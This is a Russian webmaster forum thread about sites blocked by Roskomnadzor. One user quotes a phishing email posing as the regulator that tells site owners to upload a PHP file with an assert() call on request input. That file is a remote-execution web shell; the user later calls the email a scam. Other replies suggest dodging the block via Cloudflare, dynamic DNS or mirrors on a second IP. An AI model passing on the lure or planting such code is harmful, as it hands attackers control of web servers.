- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Скорее всего, провайдеры блокируют не по ip, а по доменному имени
Как раз наоборот
вот какой ответ я получил от службы поддержки хостинга (я спрашивал почему полностью заблокировали сайт а не отключили его для РФ)
занчит блокируют по IP
а это значит, что использование динамического IP должно решить проблему, например, с помощью _dnsmadeeasy.com или подобных
на худой конец можно подключить к cloudflare это по крайней мере поможет скрыть ваш хостинг и предотвратить ограничение доступа к сайту со стороны хостинга как это было в моем случае
Как раз наоборот
вот какой ответ я получил от службы поддержки хостинга (я спрашивал почему полностью заблокировали сайт а не отключили его для РФ)
занчит блокируют по IP
Так я не понял, Вам провайдер заблокировал доступ, или хостинг отключил сайт? Если первое, то это плохой провайдер, который по ip блокирует, но в любом случае, у других провайдеров (и уж тем более за рубежом) сайт доступен. Если хостинг, то надо именно с ним решать проблему, так как доступ вообще к сайту заблокирован.
Так я не понял, Вам провайдер заблокировал доступ, или хостинг отключил сайт? Если первое, то это плохой провайдер, который по ip блокирует, но в любом случае, у других провайдеров (и уж тем более за рубежом) сайт доступен. Если хостинг, то надо именно с ним решать проблему, так как доступ вообще к сайту заблокирован.
Роскомнадзор отправил письмо хостеру тот обязан подчиняться и блокировать сайт. Кроме этого в письме было сказано, что сайт будет внесен в реестр (пока еще там его нет но это ненадолго).
Я спросил у хостера почему полностью блокирует сайт, а не для РФ только. Тк логично, что законодательство других стран не нарушено и получил ответ выше. Когда он попадет в реестр он будет заблокирован только для РФ
судя по ответу хостера блокировка идет именно по IP поэтому они подчиняются и если хостер не подчинится заблокируют целый сервак со всеми сайтами
Мне вот интересно, а применить ко мне другие санкции кроме блокировки могут?
Как-то неохото терять сайт, много сил вложено, пусть под фильтром но все же.
Причина "Осуществление незаконной деятельности по организации и проведению лотерей без разрешения Правительства Российской Федерации" не так уж и безвинна, мало чего там стуканет им, потом попробуй докажи
Перезжайте на впс, желательно на тот где дадут два ип, второй не трогайте, переклеивайте себе спокойно сайт, когда переклеится, зеркало разместите на втором ип. А там уже как повезет, в любом случае хостинг мозги трахать не будет из серии - забанят ип, пострадают не в чем невинные сайты
Извините, что в этом топике спрашиваю, Тоже получил на почту от Роскомнадзора "Уведомление о внесении сайта www.XXXXXXXXXX в реестр организаторов распространения информации в сети «Интернет»".
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.ххххххххххх.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2¬1618/2015, Ваш сайт www.хххххххххххх.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени www.ххххххххх.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id127034.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени www.хххххххххх.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.ххххххххххххх.ru/reestr/reestr-id127034.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.ххххххххх.ru, следую инструкции указанной выше, то Ваш сайт www.ххххххххххххх.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Кто может подсказать, как реагировать в этом случае? Сайт пока нормально работает.
---------- Добавлено 01.09.2015 в 23:12 ----------
Извиняюсь, уже понял, что это лажа.
Если оставлю сайт юридические последствия могут быть для меня какие-нибудь?
Ну посмотрите историю когда 136 сайтов забанили и сегодняшнее число. Математика и логика.
На какую страницу ссылался Роскомнадзор? Что на ней было?
На какую страницу ссылался Роскомнадзор? Что на ней было?
Нет определенной страницы, был только весь сайт. И это не развод типа от роскомнадзора, эта тема уже поднималась на этом форуме.
Короче в письме указывалось что надо закрыть весь сайт(( Уже забанили(((
Пока никаких мер не предпринял.
Интересно можно им по поводу адалт сайта написать? или это окончательно
Интересно можно им по поводу адалт сайта написать? или это окончательно
А смысл писать если там решение суда, только судом может быть отменено